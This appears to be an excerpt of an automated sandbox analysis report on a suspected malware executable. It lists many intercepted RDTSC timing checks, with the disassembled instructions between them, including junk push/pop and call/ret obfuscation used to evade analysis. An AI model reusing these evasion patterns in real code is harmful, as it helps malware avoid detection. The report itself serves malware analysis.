                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A31 second address: 619A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A43 second address: 619A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A47 second address: 619A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F06687C5EE8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF532 second address: 5CF563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0668FAD203h 0x00000008 jmp 00007F0668FAD209h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF563 second address: 5CF570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF570 second address: 5CF578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF578 second address: 5CF57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF57E second address: 5CF5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD208h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61BB13 second address: 61BB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F06687C5EE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F06687C5EE6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61BB2C second address: 61BB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61FD2E second address: 61FD34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 623B4E second address: 623B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 623B52 second address: 623B65 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F06687C5EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D7E8C second address: 5D7E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D7E92 second address: 5D7E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624C46 second address: 624C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624C4C second address: 624C51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E16 second address: 625E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E1B second address: 625E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E21 second address: 625E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624F00 second address: 624F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624F05 second address: 624F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 626F54 second address: 626F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 626F5A second address: 626F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 628149 second address: 62816A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F06687C5EF5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6281F1 second address: 6281F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62717D second address: 627187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 627187 second address: 627216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F0668FAD207h 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F0668FAD1F8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0668FAD1F8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov eax, dword ptr [ebp+122D02FDh] 0x00000058 mov dword ptr [ebp+122D24D4h], esi 0x0000005e push FFFFFFFFh 0x00000060 mov di, CD25h 0x00000064 push eax 0x00000065 js 00007F0668FAD213h 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F0668FAD1F6h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6283EA second address: 6283EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A080 second address: 62A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6292A1 second address: 6292A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A093 second address: 62A0F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0668FAD1F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D27B4h], edi 0x00000013 je 00007F0668FAD1F9h 0x00000019 mov bx, ax 0x0000001c push 00000000h 0x0000001e mov edi, 72794600h 0x00000023 mov di, B374h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F0668FAD1F8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov ebx, 6F64E207h 0x00000048 or dword ptr [ebp+122D2444h], edx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jns 00007F0668FAD1F6h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A0F5 second address: 62A108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6292A5 second address: 62930E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 234AC757h 0x0000000f cmc 0x00000010 push dword ptr fs:[00000000h] 0x00000017 movsx edi, di 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F0668FAD1F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0DBDh] 0x00000041 mov bl, F1h 0x00000043 push FFFFFFFFh 0x00000045 push eax 0x00000046 movsx edi, di 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jo 00007F0668FAD206h 0x00000053 jmp 00007F0668FAD200h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A2A5 second address: 62A2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A2B1 second address: 62A2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C0CA second address: 62C0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E1CD second address: 62E1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F0668FAD1F6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E1DA second address: 62E20B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06687C5EECh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06687C5EF0h 0x0000000f jmp 00007F06687C5EF1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C321 second address: 62C33A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C33A second address: 62C33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E7C5 second address: 62E7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F0668FAD200h 0x0000000e jmp 00007F0668FAD1FAh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E7E1 second address: 62E7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 630708 second address: 6307B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f pushad 0x00000010 mov dword ptr [ebp+122D26EFh], edx 0x00000016 jmp 00007F0668FAD1FBh 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0668FAD1F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 jmp 00007F0668FAD209h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F0668FAD1F8h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 jmp 00007F0668FAD1FBh 0x0000005e mov dword ptr [ebp+122D206Dh], esi 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 jmp 00007F0668FAD1FFh 0x0000006d pop ecx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6307B5 second address: 6307E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06687C5EFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d je 00007F06687C5EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631694 second address: 631698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631698 second address: 6316AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EF0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E9DF second address: 62E9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E9E5 second address: 62E9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6317C8 second address: 631801 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0668FAD209h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0668FAD207h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631801 second address: 631805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 631805 second address: 63180B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 633686 second address: 63368A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3AC second address: 66D3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEDh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F06687C5EF0h 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3D6 second address: 66D3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3DC second address: 66D3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3E0 second address: 66D3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0668FAD1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0668FAD1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3FC second address: 66D400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D400 second address: 66D404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 672137 second address: 672142 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6722E5 second address: 6722EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62143C second address: 621440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621440 second address: 62145E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0668FAD204h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62145E second address: 6214F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F06687C5EE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 call 00007F06687C5EEAh 0x00000029 sbb cx, DC56h 0x0000002e pop ecx 0x0000002f mov dx, 4D41h 0x00000033 mov ebx, dword ptr [ebp+1248C4B0h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F06687C5EE8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sbb ecx, 26F31E33h 0x00000059 jo 00007F06687C5EEBh 0x0000005f add dx, B3B4h 0x00000064 add eax, ebx 0x00000066 push ebx 0x00000067 mov edi, dword ptr [ebp+122D34F4h] 0x0000006d pop edi 0x0000006e nop 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jne 00007F06687C5EE6h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6214F8 second address: 621518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621518 second address: 62158D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jmp 00007F06687C5EEDh 0x0000000e pop ecx 0x0000000f jp 00007F06687C5EECh 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F06687C5EE8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F06687C5EE8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d sub di, BB10h 0x00000052 nop 0x00000053 push ebx 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621537 second address: 62158D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F0668FAD1F8h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000004h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F0668FAD1F8h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c sub di, BB10h 0x00000041 nop 0x00000042 push ebx 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67258D second address: 6725A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F06687C5EECh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6725A2 second address: 6725A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67319A second address: 67319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67319E second address: 6731B0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0668FAD1F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6731B0 second address: 6731CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EF9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6731CF second address: 6731D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6765FD second address: 676601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 676601 second address: 676626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0668FAD208h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6762D5 second address: 6762EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F06687C5EE6h 0x0000000c popad 0x0000000d je 00007F06687C5EEEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E34C second address: 67E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
